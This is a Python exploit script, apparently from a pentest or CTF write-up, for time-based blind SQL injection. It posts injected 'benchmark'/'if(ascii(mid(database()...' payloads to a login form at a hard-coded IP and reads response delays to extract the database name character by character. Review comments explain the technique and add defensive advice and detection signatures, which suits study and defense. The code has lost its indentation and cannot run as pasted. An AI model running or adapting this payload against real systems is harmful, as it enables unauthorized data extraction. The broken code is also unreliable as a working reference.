import requests
# Time-based blind SQL injection probe against a login form, as captured from a pentest
# writeup. Nothing is read back from the page body: the only signal the script uses is
# each response's latency (`resp.elapsed`), which is what makes this "blind".
burp0_url = "http://114.115.143.25:32770/index.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
}
# Candidate characters tried at each position of the value being recovered.
# NOTE(review): "\]" is not a valid Python escape sequence; CPython keeps the backslash
# (with a SyntaxWarning/DeprecationWarning), so the set contains a literal backslash
# followed by "]". Harmless for the loop, but it is not what the author wrote.
all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
# Characters recovered so far, in position order.
query_str = ''
# NOTE(review): the loop bodies below have lost their indentation (every line is at
# column 0), so as pasted this is not syntactically valid Python — a `for` whose next
# line is not indented raises IndentationError. Read the structure from the keywords.
for length in range(1, 20):
for char in all_print_str:
# The injected expression goes into the password field. When the guessed character
# matches, the database executes the expensive `benchmark(...)` call and the response is
# delayed; otherwise it returns promptly. Response time is therefore the yes/no oracle.
payload = "mochu7'or/**/if(ascii(mid(database(),{0},1))/**/like/**/{1},benchmark(20000000,md5('mochu7')),1)#".format(length, ord(char))
burp0_data = {"username": "admin", "password": payload}
# Every guess is one full POST: for 19 positions and ~94 candidates that is up to ~1800
# requests to the same endpoint, each taking seconds on a hit.
resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
# print('{} : {} : {}'.format(length, char, resp.elapsed.total_seconds()))  # response time (debug)
# 3 s is the fixed latency threshold used to tell "matched" from "not matched".
# Defender's view: the server-side root cause is string-built SQL; parameterized queries
# remove it entirely. Detection: bursts of POSTs to the login endpoint whose password
# parameter contains SQL fragments such as `benchmark(` or `if(ascii(mid(`, with
# server processing times of several seconds, are a reliable signature of this probe.
if resp.elapsed.total_seconds() > 3:
query_str += char
print(query_str)
# NOTE(review): `else: continue` is a no-op here — the loop advances regardless — and
# the inner loop is never broken after a hit, so later candidates at the same position
# are still tried; any further slow response would append a second character.
else:
continue